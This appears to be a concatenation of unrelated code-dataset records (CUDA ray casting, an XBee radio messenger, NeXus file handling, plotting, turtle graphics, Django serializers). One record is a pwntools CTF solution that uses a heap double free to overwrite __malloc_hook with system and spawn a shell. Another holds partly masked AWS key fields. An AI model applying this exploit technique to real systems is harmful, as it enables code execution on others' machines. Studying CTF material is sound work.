msg = 'NXDL file is not valid: ' + self.file_name\n# msg += '\\n' + str(exc)\n# \n# # parse the XML content of this NXDL definition element\n# for node in self.lxml_tree.getroot():\n# if isinstance(node, lxml.etree._Comment):\n# continue\n# \n# element_type = node.tag.split('}')[-1]\n# if element_type not in ('doc',):\n# obj = self.nxdl_file_set.nxdl_element_factory.get_element(element_type)\n# _break = True\n# \n# \n# class NXDL_element__attribute(NXDL_Base):\n# '''\n# a complete description of a specific NXDL attribute element\n# \n# :param obj parent: instance of NXDL_Base\n# '''\n# \n# def __init__(self, parent):\n# NXDL_Base.__init__(self, parent)\n# self.name = None\n# self.type = 'str'\n# self.required = False\n# self.default_value = None\n# self.enum = []\n# self.patterns = []\n# self.nxdl_attributes = {}\n# \n# def __str__(self, *args, **kwargs):\n# msg = '%s(' % type(self).__name__\n# l = []\n# for k in 'name type required default_value enum patterns'.split():\n# l.append('%s=%s' % (k, str(self.__getattribute__(k))))\n# msg += ', '.join(l)\n# msg += ')'\n# \n# return msg\n# \n# def set_defaults(self, rules):\n# '''\n# use the NXDL Schema to set defaults\n# \n# :param obj rules: instance of Schema_Attribute\n# '''\n# if self.parent is not None:\n# get_element = self.parent.nxdl_file_set.nxdl_element_factory.get_element\n# elif hasattr(self, 'nxdl_file_set'):\n# get_element = self.nxdl_file_set.nxdl_element_factory.get_element # alias\n# else:\n# raise RuntimeError('cannot locate get_element()')\n# \n# for k in 'required default_value enum patterns name type'.split():\n# if hasattr(rules, k):\n# self.__setattr__(k, rules.__getattribute__(k))\n# # TODO: convert type (such as nx:validItemName into pattern\n# # self.parent.nxdl.children['attribute']\n# \n# for k, v in rules.attrs.items():\n# self.nxdl_attributes[k] = get_element('attribute', parent=self)\n# \n# _breakpoint = True # TODO:\n# \n# \n# class NXDL_element__field(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL field\n# '''\n# \n# optional = True\n# \n# nxdl_attributes = {}\n# \n# \n# class NXDL_element__group(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL group\n# '''\n# \n# optional = True\n# \n# nxdl_attributes = {}\n# nxdl_groups = {}\n# nxdl_fields = {}\n# \n# \n# class NXDL_element__link(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL link\n# '''\n# \n# optional = True\n# \n# \n# class NXDL_element__symbols(NXDL_Base): # TODO:\n# '''\n# a complete description of a specific NXDL symbol\n# '''\n# \n# optional = True\n\n\nclass Mixin(object):\n \n def __init__(self): # TODO:\n pass\n \n def __str__(self, *args, **kwargs):\n return punx.nxdl_schema.render_class_str(self)\n\n\nclass NXDL_element__definition(punx.singletons.Singleton, Mixin):\n '''\n contents of a *definition* element in a NXDL XML file\n \n :param str path: absolute path to NXDL definitions directory (has nxdl.xsd)\n '''\n \n def __init__(self, path):\n self.nxdl_path = path\n self.schema_file = os.path.join(path, punx.nxdl_schema.NXDL_XSD_NAME)\n assert(os.path.exists(self.schema_file))\n nxdl_defaults = punx.nxdl_schema.NXDL_Summary(self.schema_file)\n \n for k, v in nxdl_defaults.definition.__dict__.items():\n self.__setattr__(k, v)\n del self.children\n\n # parse this content into classes in _this_ module\n for k, v in self.attributes.items():\n attribute = NXDL_element__attribute(nxdl_defaults.attribute)\n obj = copy.deepcopy(attribute) # ALWAYS make a copy of that\n for item in 'name type required'.split():\n obj.__setattr__(item, v.__getattribute__(item)) # TODO: should override default\n del obj.maxOccurs\n del obj.minOccurs\n # TODO: what else to retain?\n self.attributes[k] = obj\n\n for k, v in self.elements.items(): # TODO: is this a field?\n print(k, str(v))\n# field = NXDL_element__field(nxdl_defaults.field)\n# obj = copy.deepcopy(field) # ALWAYS make a copy of that\n\n for k, v in self.groups.items():\n print(k, str(v))\n# group = NXDL_element__group(nxdl_defaults.group)\n# obj = copy.deepcopy(group) # ALWAYS make a copy of that\n\n def set_file(self, fname):\n self.file_name = fname\n assert(os.path.exists(fname))\n self.title = os.path.split(fname)[-1].split('.')[0]\n self.category = os.path.split(os.path.dirname(fname))[-1]\n \n def parse(self):\n pass\n\n\nclass NXDL_element__attribute(Mixin):\n '''\n contents of a *attribute* element in a NXDL XML file\n '''\n \n def __init__(self, nxdl_defaults):\n for k, v in nxdl_defaults.__dict__.items():\n self.__setattr__(k, v)\n\n\nclass NXDL_element__field(Mixin):\n '''\n contents of a *field* element in a NXDL XML file\n '''\n\n\nclass NXDL_element__group(Mixin):\n '''\n contents of a *group* element in a NXDL XML file\n '''\n\n\nclass NXDL_element__link(Mixin):\n '''\n contents of a *link* element in a NXDL XML file\n '''\n\n\nclass NXDL_element__symbols(Mixin):\n '''\n contents of a *symbols* element in a NXDL XML file\n '''\n\n\n# class NXDL_ElementFactory(object):\n# '''\n# creates and serves new classes with proper default values from the NXDL rules\n# \n# called by :class:`punx.cache_manager.NXDL_File_Set()`\n# '''\n# \n# db = {} # internal set of known elements\n# file_set = None\n# creators = {\n# 'definition': NXDL_element__definition,\n# 'attribute': NXDL_element__attribute,\n# 'field': NXDL_element__field,\n# 'group': NXDL_element__group,\n# 'link': NXDL_element__link,\n# 'symbols': NXDL_element__symbols,\n# }\n# \n# def __init__(self, file_set):\n# self.file_set = file_set\n# \n# def get_element(self, element_name, parent=None):\n# '''\n# create a new element or get one already built with defaults from the XML Schema\n# '''\n# if element_name not in self.db:\n# if element_name == 'definition':\n# # special case\n# self.db[element_name] = NXDL_element__definition(self.file_set)\n# \n# elif element_name in self.creators.keys():\n# self.db[element_name] = self.creators[element_name](parent)\n# \n# else:\n# raise KeyError('unhandled NXDL element: ' + element_name)\n# \n# element = self.db[element_name]\n# element.nxdl = self.file_set.schema_manager.nxdl\n# \n# schema_types = element.nxdl.schema_types # alias\n# if element_name not in schema_types:\n# msg = 'unexpected element type: ' + element_name\n# msg += ', expected one of these: ' + ' '.join(sorted(schema_types.keys()))\n# raise KeyError(msg)\n# element.set_defaults(schema_types[element_name])\n# \n# element = copy.deepcopy(self.db[element_name])\n# \n# # TODO set the defaults accordingly for application definitions\n# \n# return element\n\n\ndef main():\n import punx.cache_manager\n cm = punx.cache_manager.CacheManager()\n if cm is not None and cm.default_file_set is not None:\n nxdl_dict = NXDL_Manager(cm.default_file_set).classes\n\n _t = True\n for k, v in nxdl_dict.items():\n print(v.category, k)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"src/punx/nxdl_manager.py","file_name":"nxdl_manager.py","file_ext":"py","file_size_in_byte":13867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"375960218","text":"import numpy as np\nfrom utils import load_all_pickles\nimport matplotlib.pyplot as plt\n\npath = 'logfiles/Beluga/accidentally_huge_outpaint'\n# unpickle outputs\noutputs = load_all_pickles(path)\n\n# find x and y stuff\nnruns = len(outputs)\nfilters = np.zeros(nruns)\nepoch = np.zeros(nruns)\nfilter_size = np.zeros(nruns)\nlayers = np.zeros(nruns)\nn_samples = np.zeros(nruns)\n\ndensity_overlap = np.zeros(nruns)\ninteractions_overlap = np.zeros(nruns)\nfourier_overlap = np.zeros(nruns)\naverage_density = np.zeros(nruns)\naverage_interactions = np.zeros(nruns)\nvariance = np.zeros(nruns)\npooled_variance = np.zeros(nruns)\nsamples=[]\n\nfor i in range(len(outputs)):\n filters[i] = outputs[i]['filters']\n epoch[i] = outputs[i]['epoch']\n filter_size[i] = outputs[i]['filter size']\n layers[i] = outputs[i]['layers']\n n_samples[i] = outputs[i]['n_samples']\n\n density_overlap[i] = outputs[i]['density overlap']\n interactions_overlap[i] = outputs[i]['interactions overlap']\n fourier_overlap[i] = outputs[i]['fourier overlap']\n average_density[i] = outputs[i]['average density']\n average_interactions[i] = outputs[i]['average interactions']\n variance[i] = outputs[i]['spatial variance']\n pooled_variance[i] = outputs[i]['pooled variance']\n samples.append(outputs[i]['sample'])\n\n# graph\n'''\nfilters = np.roll(filters[epoch!=-1].reshape(4,6),-1,axis=0)\nlayers = np.roll(layers[epoch!=-1].reshape(4,6), -1, axis=0)\ndensity_overlap = np.roll(density_overlap[epoch!=-1].reshape(4,6), -1, axis=0)\ninteractions_overlap = np.roll(interactions_overlap[epoch!=-1].reshape(4,6),-1,axis=0)\nfourier_overlap = np.roll(fourier_overlap[epoch!=-1].reshape(4,6), -1, axis = 0)\nvariance = np.roll(variance[epoch!=-1].reshape(4,6), -1, axis = 0)\npooled_variance = np.roll(pooled_variance[epoch!=-1].reshape(4,6), -1, axis = 0)\n\nfilters = np.roll(np.insert(filters[epoch!=-1],0,(0,0,0)).reshape(4,6),-1,axis=0)\nlayers = np.roll(np.insert(layers[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis=0)\ndensity_overlap = np.roll(np.insert(density_overlap[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis=0)\ninteractions_overlap = np.roll(np.insert(interactions_overlap[epoch!=-1],0,(0,0,0)).reshape(4,6),-1,axis=0)\nfourier_overlap = np.roll(np.insert(fourier_overlap[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis = 0)\nvariance = np.roll(np.insert(variance[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis = 0)\npooled_variance = np.roll(np.insert(pooled_variance[epoch!=-1],0,(0,0,0)).reshape(4,6), -1, axis = 0)\n'''","sub_path":"analysis_scripts/Hyperparameter_Outputs-DESKTOP-OVNVDG1.py","file_name":"Hyperparameter_Outputs-DESKTOP-OVNVDG1.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"557362864","text":"from pwn import *\n\nr = process('./t-note')\n#r = remote('edu-ctf.csie.org', 10179)\nelf = ELF('./libc.so')\n\nif sys.argv[1] == 'debug': raw_input('debug')\n\ndef add(size, data):\n r.sendafter('> ', '1')\n r.sendafter('Size: ', str(size))\n r.sendafter('Note: ', data)\n\ndef show(index):\n r.sendafter('> ', '2')\n r.sendafter('Which note do you want to show?\\nIndex: ', str(index))\n\ndef delete(index):\n r.sendafter('> ', '3')\n r.sendafter('Which note do you want to delete?\\nIndex: ', str(index))\n\nadd(0x410, 'a')\nadd(0x20, 'b')\n\ndelete(0)\nshow(0)\nr.recvline()\nelf.address = u64(r.recv(6) + '\\0\\0') - 0x3ebca0\n\ndelete(1)\ndelete(1)\n\nadd(0x20, p64(elf.sym.__malloc_hook))\nadd(0x20, 'c')\n\nadd(0x20, p64(elf.sym.system))\n\nr.sendafter('> ', '1')\nr.sendafter('Size: ', str(elf.search('/bin/sh').next()))\n\n\nr.interactive()\n","sub_path":"Games/SecureProgramming2019/T-Note/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"104936584","text":"# -*- coding: utf-8 -*-\n# Этот токен невалидный, можете даже не пробовать :)\naws_access_key_id = 'AK****'\naws_secret_access_key = '3ELSX7y****' \naws_session_token = None \nregion_name = 'eu-west-2'\nbotocore_session = None\nprofile_name = None\nname_tag = 'Slastikhin'\nowner_id = '7179*****'\t\t\t# Need for AMI filter\nhosts = ['a.ztest.pp.ua','b.ztest.pp.ua','c.ztest.pp.ua']\nscan_ports = [80,22,3389]\nsocket_timeout = 1","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"533035985","text":"from numba import cuda as nbcuda\nimport numpy as np\nimport math\n\n@nbcuda.jit(device = True)\ndef length(vector):\n\treturn math.sqrt(vector[0]**2.0 + vector[1]**2.0 + vector[2]**2.0)\n\n@nbcuda.jit(device = True)\ndef dot(vector1, vector2):\n\treturn vector1[0]*vector2[0] + vector1[1]*vector2[1] + vector1[2]*vector2[2]\n\n@nbcuda.jit(device = True)\ndef normalize(vector):\n\tdot_p = dot(vector, vector)\n\n\treturn (vector[0]/math.sqrt(dot_p), vector[1]/math.sqrt(dot_p), vector[2]/math.sqrt(dot_p))\n\n@nbcuda.jit(device = True)\ndef clip(n):\n\tif n > 255:\n\t\tn = 255\n\telif n < 0:\n\t\tn = 0\n\treturn n\n\n@nbcuda.jit(device = True)\ndef clipWithBounds(n, n_min, n_max):\n\tif n > n_max:\n\t\treturn n_max\n\telse:\n\t\tif n < n_min:\n\t\t\treturn n_min\n\t\telse:\n\t\t\treturn n\n\n@nbcuda.jit(device = True)\ndef yRotate(pos, theta):\n\tc = math.cos(theta)\n\ts = math.sin(theta)\n\n\treturn (c*pos[0] + s*pos[2], pos[1], -s*pos[0] + c*pos[2])\n\n@nbcuda.jit(device = True)\ndef func(c, r, s, id_, volSize, params):\n\tpos0 = (volSize[0]/2, volSize[1]/2, volSize[2]/2)\n\n\tdx = float(c - pos0[0])\n\tdy = float(r - pos0[1])\n\tdz = float(s - pos0[2])\n\n\tif id_ == 0: #Sphere\n\t\treturn math.sqrt(dx*dx + dy*dy + dz*dz) - params[0]\n\n\telif id_ == 1: #Torus\n\t\tr = math.sqrt(dx*dx + dy*dy)\n\t\treturn math.sqrt((r - params[0])*(r - params[0]) + dz*dz) - params[1]\n\n\telif id_ == 2: #Block\n\t\tx = abs(dx) - params[0]\n\t\ty = abs(dy) - params[1]\n\t\tz = abs(dz) - params[2]\n\t\tif x <= 0 and y <= 0 and z <= 0:\n\t\t\treturn max(x, max(y,z))\n\t\telse:\n\t\t\tx = max(x, 0)\n\t\t\ty = max(y, 0)\n\t\t\tz = max(z, 0)\n\t\t\treturn math.sqrt(x*x + y*y + z*z)\n\n@nbcuda.jit(device = True)\ndef scrIdxToPos(c, r, w, h, zs):\n\treturn (c - w/2.0, r - h/2.0, zs)\n\n@nbcuda.jit(device = True)\ndef paramRay(ray, t):\n\treturn (ray[0][0] + t*(ray[1][0]),\n\t\t\tray[0][1] + t*(ray[1][1]),\n\t\t\tray[0][2] + t*(ray[1][2]))\n\n@nbcuda.jit(device = True)\ndef intersectBox(ray, boxmin, boxmax):\n\tif ray[1][0] == 0.0:\n\t\tinvr_x = np.inf\n\telse:\n\t\tinvr_x = 1.0/ray[1][0]\n\n\tif ray[1][1] == 0.0:\n\t\tinvr_y = np.inf\n\telse:\n\t\tinvr_y = 1.0/ray[1][1]\n\n\tif ray[1][2] == 0.0:\n\t\tinvr_z = np.inf\n\telse:\n\t\tinvr_z = 1.0/ray[1][2]\n\n\tinvR = (invr_x,\n\t\t\tinvr_y,\n\t\t\tinvr_z)\n\n\ttbot = (invR[0]*(boxmin[0] - ray[0][0]),\n\t\t\tinvR[1]*(boxmin[1] - ray[0][1]),\n\t\t\tinvR[2]*(boxmin[2] - ray[0][2]))\n\n\tttop = (invR[0]*(boxmax[0] - ray[0][0]),\n\t\t\tinvR[1]*(boxmax[1] - ray[0][1]),\n\t\t\tinvR[2]*(boxmax[2] - ray[0][2]))\n\n\ttmin = (min(ttop[0], tbot[0]),\n\t\t\tmin(ttop[1], tbot[1]),\n\t\t\tmin(ttop[2], tbot[2]))\n\n\ttmax = (max(ttop[0], tbot[0]),\n\t\t\tmax(ttop[1], tbot[1]),\n\t\t\tmax(ttop[2], tbot[2]))\n\n\ttnear = max(max(tmin[0], tmin[1]), max(tmin[0], tmin[2]))\n\ttfar = min(min(tmax[0], tmax[1]), min(tmax[0], tmax[2]))\n\n\treturn (tfar > tnear, tnear, tfar)\n\n@nbcuda.jit(device = True)\ndef posToVolIndex(pos, volSize):\n\treturn (int(pos[0] + volSize[0]/2.0), int(pos[1] + volSize[1]/2.0), int(pos[2] + volSize[2]/2.0))\n\n@nbcuda.jit(device = True)\ndef flatten(index, volSize):\n\treturn int(index[0] + index[1]*volSize[0] + index[2]*volSize[0]*volSize[1])\n\n@nbcuda.jit(device = True)\ndef density(d_vol, volSize, pos):\n\tvol_index = posToVolIndex(pos, volSize)\n\n\ti = vol_index[0]\n\tj = vol_index[1]\n\tk = vol_index[2]\n\n\tw = volSize[0]\n\th = volSize[1]\n\td = volSize[2]\n\n\trem = (pos[0] - math.floor(pos[0]),\n\t\t pos[1] - math.floor(pos[1]),\n\t\t pos[2] - math.floor(pos[2]))\n\n\tindex = (clipWithBounds(i, 0, w - 2),\n\t\t\t clipWithBounds(j, 0, h - 2),\n\t\t\t clipWithBounds(k, 0, d - 2))\n\n\tdens000 = d_vol[flatten(index, volSize)]\n\tdens100 = d_vol[flatten((index[0] + 1, index[1], index[2]), volSize)]\n\tdens010 = d_vol[flatten((index[0], index[1] + 1, index[2]), volSize)]\n\tdens001 = d_vol[flatten((index[0], index[1], index[2] + 1), volSize)]\n\tdens110 = d_vol[flatten((index[0] + 1, index[1] + 1, index[2]), volSize)]\n\tdens101 = d_vol[flatten((index[0] + 1, index[1], index[2] + 1), volSize)]\n\tdens011 = d_vol[flatten((index[0], index[1] + 1, index[2] + 1), volSize)]\n\tdens111 = d_vol[flatten((index[0] + 1, index[1] + 1, index[2] + 1), volSize)]\n\n\treturn dens000*(1 - rem[0])*(1 - rem[1])*(1 - rem[2]) + \\\n\t\t dens100*(rem[0])*(1 - rem[1])*(1 - rem[2]) + \\\n\t\t dens010*(1 - rem[0])*(rem[1])*(1 - rem[2]) + \\\n\t\t dens001*(1 - rem[0])*(1 - rem[1])*(rem[2]) + \\\n\t\t dens110*(rem[0])*(rem[1])*(1 - rem[2]) + \\\n\t\t dens101*(rem[0])*(1 - rem[1])*(rem[2]) + \\\n\t\t dens011*(1 - rem[0])*(rem[1])*(rem[2]) + \\\n\t\t dens111*(rem[0])*(rem[1])*(rem[2])\n\n@nbcuda.jit(device = True)\ndef rayCastShader(d_vol, volSize, boxRay, threshold, EPS):\n\tshade = (96, 0, 192, 0)\n\n\tpos = boxRay[0]\n\n\tlen_ = length(boxRay[1])\n\n\tf = density(d_vol, volSize, pos)\n\n\tt = 0.0\n\twhile f > threshold + EPS and t < 1.0:\n\t\tt += (f - threshold)/len_\n\n\t\tpos = paramRay(boxRay, t)\n\n\t\tf = density(d_vol, volSize, pos)\n\n\tif t < 1.0:\n\t\tgrad = ((density(d_vol, volSize, (pos[0] + EPS, pos[1], pos[2])) - density(d_vol, volSize, pos))/EPS,\n\t\t\t\t(density(d_vol, volSize, (pos[0], pos[1] + EPS, pos[2])) - density(d_vol, volSize, pos))/EPS,\n\t\t\t\t(density(d_vol, volSize, (pos[0], pos[1], pos[2] + EPS)) - density(d_vol, volSize, pos))/EPS)\n\n\t\tgrad_norm = normalize(grad)\n\t\tboxray_norm = normalize(boxRay[1])\n\n\t\tintensity = -1*(grad_norm[0]*boxray_norm[0] + grad_norm[1]*boxray_norm[1] + grad_norm[2]*boxray_norm[2])\n\n\t\tshade = (int(255*intensity), int(0*intensity), int(0*intensity), 0)\n\n\treturn shade\n\n@nbcuda.jit(device = True)\ndef planeSDF(pos, norm, d):\n\treturn dot(pos, normalize(norm)) - d\n\n@nbcuda.jit(device = True)\ndef rayPlaneIntersect(myRay, n, dist):\n\tf0 = planeSDF(paramRay(myRay, 0.0), n, dist)\n\tf1 = planeSDF(paramRay(myRay, 1.0), n, dist)\n\n\tresult = (f0 * f1 < 0)\n\n\tif result == True:\n\t\tt = (0 - f0)/(f1 - f0)\n\n\treturn result, t\n\n@nbcuda.jit(device = True)\ndef sliceShader(d_vol, volSize, boxRay, gain, dist, norm):\n\tshade = (96, 0, 192, 0)\n\n\tresult, t = rayPlaneIntersect(boxRay, norm, dist)\n\tif result == True:\n\t\tsliceDens = density(d_vol, volSize, paramRay(boxRay, t))\n\t\tshade = (int(48), int(clip(-10*(1.0 + gain)*sliceDens)), int(96), int(255))\n\n\treturn shade\n\n@nbcuda.jit(device = True)\ndef volumeRenderShader(d_vol, volSize, boxRay, threshold, numSteps):\n\tshade = (96, 0, 192, 0)\n\n\tdt = 1.0/numSteps\n\tlen_ = length(boxRay[1])/numSteps\n\tpos = boxRay[0]\n\tval = density(d_vol, volSize, pos)\n\n\taccum = 0.0\n\tt = 0.0\n\n\twhile t < 1:\n\n\t\tif val - threshold < 0.0:\n\t\t\taccum += abs(val - threshold)*len_\n\n\t\tpos = paramRay(boxRay, t)\n\n\t\tval = density(d_vol, volSize, pos)\n\n\t\tt += dt\n\n\tif clip(accum) > 0.0:\n\t\tshade = (96, int(clip(accum)), 192, 0)\n\n\treturn shade","sub_path":"vis_3d/device_funcs.py","file_name":"device_funcs.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"553821988","text":"from apscheduler.schedulers.background import BackgroundScheduler\nfrom xbee import XBee, python2to3\nfrom observer import Observer,observes\nimport itertools\n\ndef format_address(int_addr):\n \"\"\"\n Convert integer to a 16-bit byte string\n \"\"\"\n high_byte = python2to3.intToByte((int_addr & 0xFF00) >> 4)\n low_byte = python2to3.intToByte(int_addr & 0xFF)\n return high_byte + low_byte\n\ndef parse_address(byte_addr):\n \"\"\"\n Convert 16-bit address byte string to an integer\n \"\"\"\n high_byte = python2to3.byteToInt(byte_addr[0])\n low_byte = python2to3.byteToInt(byte_addr[1])\n return (high_byte << 8) + low_byte\n\ndef parse_rssi(bytes_rssi):\n \"\"\"\n Convert rssi byte into signed integer\n \"\"\"\n return 0 - python2to3.byteToInt(bytes_rssi)\n\n__id_gen__ = itertools.cycle(python2to3.intToByte(val) for val in range(1, 256))\ndef next_id():\n return __id_gen__.next()\n\n# Cruft to throw into ping message to make it long\nPING_FILLER = bytes(bytearray(b'\\x00' for _ in range(100)))\n\nclass RetryInfo(object):\n \"\"\"\n Holds info for a message the requires\n acknowledgment / retries\n \"\"\"\n def __init__(self, message, retries=0):\n self.message = message\n self.msg_id = message['data'][0]\n self.retries = retries\n\n# spec for input messages mapped by msg id in frame\n# spec describes frame contents in order\n# spec = (\n# 'name',\n# 'len(int) / delimiter(byte) / None(handled by parser),\n# parsing func'\n# )\nrx_msg_specs = {\n b'\\x10': {\n 'name': 'node_broadcast',\n 'spec': []\n },\n b'\\x12': {\n 'name': 'neighbor_rssi_update',\n 'spec': [\n ('neighbor_rssi', 1, parse_rssi)\n ]\n },\n b'\\x26': {\n 'name': 'ping_response',\n 'spec': [\n ('ping_id', 1, python2to3.byteToInt)\n ]\n },\n b'\\x27': {\n 'name': 'ack',\n 'spec': [\n ('ack_id', 1, python2to3.byteToInt)\n ]\n },\n b'\\x31': {\n 'name': 'lost_rear_broadcast',\n 'spec': []\n },\n b'\\x33': {\n 'name': 'lost_node_notice',\n 'spec': []\n }\n # b'\\x22': self.parse_chain_update,\n}\n\nclass Messenger:\n \"\"\"\n Sub-class of XBee object used to translate\n XBee packets into application specific messages\n \"\"\"\n __metaclass__ = Observer\n\n def __init__(self, xbee=None, scheduler=None):\n self.xbee = xbee\n self.scheduler = scheduler\n self._retry_jobs = {}\n self._callbacks = []\n\n def set_xbee(self, xbee):\n self.xbee = xbee\n\n def set_scheduler(self, scheduler):\n self.scheduler = scheduler\n\n def register_callback(self, callback):\n \"\"\"\n Allows observer to register callback to be \n invoked when a message is received\n \"\"\"\n self._callbacks.append(callback)\n\n def report_message(self, name, *args, **kwargs):\n \"\"\"\n Report a message is received to observers\n \"\"\"\n for callback in self._callbacks:\n try:\n callback(name, *args, **kwargs)\n except:\n raise NotImplementedError(\"blah\")\n\n def send_with_retry(self, retry_info):\n \"\"\"\n Send a message, then set a job to retry message\n if an acknowledgment is not recieved. Stop\n job if retries exceeded.\n \"\"\"\n self.xbee.tx(**retry_info.message)\n retry_job = self._retry_jobs.get(retry_info.msg_id, None)\n if not retry_job and self.scheduler:\n retry_job = self.scheduler.add_job(self.send_with_retry,\\\n 'interval', seconds=1, args=[retry_info])\n self._retry_jobs[retry_info.msg_id] = retry_job\n\n if self.scheduler:\n retry_info.retries += 1\n if retry_info.retries > 3:\n self.report_message('message_timed_out', **{\n 'message_id': python2to3.byteToInt(retry_info.msg_id)\n })\n retry_job.remove()\n del self._retry_jobs[retry_info.msg_id]\n\n @observes('at_response')\n def at_command_parse(self, status, command, parameter):\n \"\"\"\n Parse response to AT command sent to XBee radio.\n \"\"\"\n if str(command) == \"MY\" and status == b'\\x00':\n app_msg = {\"address\": parse_address(parameter)}\n self.report_message('self_address', **app_msg)\n\n @observes('rx')\n def parse_rx(self, source_addr, rssi, rf_data):\n \"\"\"\n Determine if parser exists for application\n level message in XBee frame, then invoke parser\n \"\"\"\n if len(rf_data) < 2:\n return\n\n msg = {\n 'source_addr': parse_address(source_addr),\n 'rssi': parse_rssi(rssi),\n 'msg_id': python2to3.byteToInt(rf_data[0])\n }\n\n spec = rx_msg_specs.get(rf_data[1], None)\n rf_data = rf_data[2:]\n if spec:\n msg_name = spec['name']\n attrs = spec['spec']\n for name,length,parser in attrs:\n if len(rf_data) < length:\n return\n msg[name] = parser(rf_data[:length])\n rf_data = rf_data[length:]\n self.report_message(msg_name, **msg)\n \n # def parse_app_ack(self, packet):\n # \"\"\"\n # Parse acknowledgment sent from other node for\n # a message that contains an application level\n # id. Remove retry job if it exists.\n # \"\"\"\n # app_frame_id = packet['rf_data'][2]\n # retry_job = self.retry_jobs.get(app_frame_id, None)\n # if retry_job:\n # retry_job.remove()\n # app_msg = {'app_frame_id': python2to3.byteToInt(app_frame_id)}\n # self.report_message('command_acknowledged', **app_msg)\n\n def request_device_address(self):\n \"\"\"\n Send a command to the attached XBee radio requesting its\n configured 16-bit address.\n \"\"\"\n command = {\n 'command': python2to3.stringToBytes('MY'),\n 'parameter': b'\\x00\\x00'\n }\n self.xbee.at(**command)\n\n def send_neighbor_rssi(self, neighbor, rssi):\n \"\"\"\n Notify a node of our sensed rssi in regards to it.\n \"\"\"\n message = {\n 'dest_addr': format_address(neighbor),\n 'data': b'\\x00\\x12' + python2to3.intToByte(0 - rssi)\n }\n self.xbee.tx(**message)\n\n def send_ping(self, rear_node, front_node):\n \"\"\"\n Send a ping that travels to the furthest node, \n then returns giving an indication of connection \n strength through the chain.\n \"\"\"\n ping_id = next_id()\n message = {\n 'dest_addr': format_address(rear_node),\n 'data': b'\\x00\\x24' + ping_id + format_address(front_node) + PING_FILLER\n }\n\n self.xbee.tx(**message)\n return python2to3.byteToInt(ping_id)\n\n def assign_neighbors(self, node_addr, rear_node, front_node):\n \"\"\"\n Send a message to a node assigning its front and rear neighbors.\n \"\"\"\n msg_id = next_id()\n message = {\n 'dest_addr': format_address(node_addr),\n 'data': msg_id + b'\\x28' + format_address(rear_node) + format_address(front_node)\n }\n\n self.send_with_retry(RetryInfo(message))\n return python2to3.byteToInt(msg_id)\n\n def deploy(self, node_addr):\n \"\"\"\n Notify a node it may deploy and proceed to move forward.\n \"\"\"\n msg_id = next_id()\n message = {\n 'dest_addr': format_address(node_addr),\n 'data': msg_id + b'\\x30'\n }\n\n self.send_with_retry(RetryInfo(message))\n return python2to3.byteToInt(msg_id)\n\n def lost_rear_acknowledge(self, node_addr):\n \"\"\"\n If a node is broadcasting it has lost the node to its rear,\n send it a message acknowledging it. We will then be its neighbor\n to the rear.\n \"\"\"\n msg_id = next_id()\n message = {\n 'dest_addr': format_address(node_addr),\n 'data': msg_id + b'\\x32'\n }\n\n self.send_with_retry(RetryInfo(message))\n return python2to3.byteToInt(msg_id)\n","sub_path":"breadcrumbs/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":8174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"394719531","text":"from turtle import *\nimport math \nglobal a\na =16\ndef p_strona(n):\n for i in range(n):\n cool(1)\n setheading(0)\n fd(a)\n lt(45)\n fd(4*a*math.sqrt(2))\n lt(135)\n fd(1.25*a)\ndef l_strona(n):\n for i in range(n):\n cool(1)\n setheading(135)\n fd(4*a*math.sqrt(2))\n setheading(0)\n fd(a)\n pd()\ndef DRZEWO(n):\n pu()\n setpos(0,-200)\n pd()\n p_strona(n)\n pu()\n setpos(0,-200)\n pd()\n l_strona(n)\n\ndef kwadrat(x):\n setheading(0)\n fillcolor(x)\n begin_fill()\n for i in range(4):\n fd(a)\n lt(90)\n end_fill()\ndef cool(x):\n czastka_a(\"skyblue\")\n czastka_b(\"skyblue\")\n\ndef czastka_b(x):\n setheading(0)\n pu()\n fd(2*a)\n pd()\n for i in range(2):\n kwadrat(x)\n pu()\n fd(1.5*a)\n pd()\n pu()\n rt(180)\n fd(2.25*a)\n setheading(-90)\n fd(a)\n pd()\n for i in range(2):\n pd()\n kwadrat(x)\n pu()\n rt(180)\n fd(a)\n lt(90)\n fd(a)\n\n \ndef czastka_a(x):\n kwadrat(x)\n setheading(90)\n fd(a)\n lt(90)\n fd(0.75*a)\n for i in range(2):\n pd()\n kwadrat(x)\n setheading(90)\n fd(a)\n lt(90)\n pu()\n fd(a)\n rt(180)\n fd(0.25*a)\n pd()\n kwadrat(x)\n fd(1.5*a)\n kwadrat(x)\nspeed(0) \nDRZEWO(7)\n \n\n\n","sub_path":"drzewo.py","file_name":"drzewo.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"303361698","text":"__author__ = 'danielebrandimarte'\n\nfrom rest_framework import serializers\nfrom notes.models import Section, Chapter, LibraryText\n\nclass SectionSerializer(serializers.ModelSerializer):\n class Meta:\n model = Section\n fields = ('id','display_title','parent','chapter')\n\nclass ChapterSerializer(serializers.ModelSerializer):\n class Meta:\n model = Chapter\n fields = ('code','display_title')\n\n\nclass LibraryTextSerializer(serializers.ModelSerializer):\n\n title = serializers.CharField(allow_blank=True, allow_null=True, max_length=200, required=True)\n body = serializers.CharField(allow_null=True, required=True, style={'base_template': 'textarea.html'})\n\n class Meta:\n model = LibraryText\n fields = ('id', 'title', 'body', 'type', 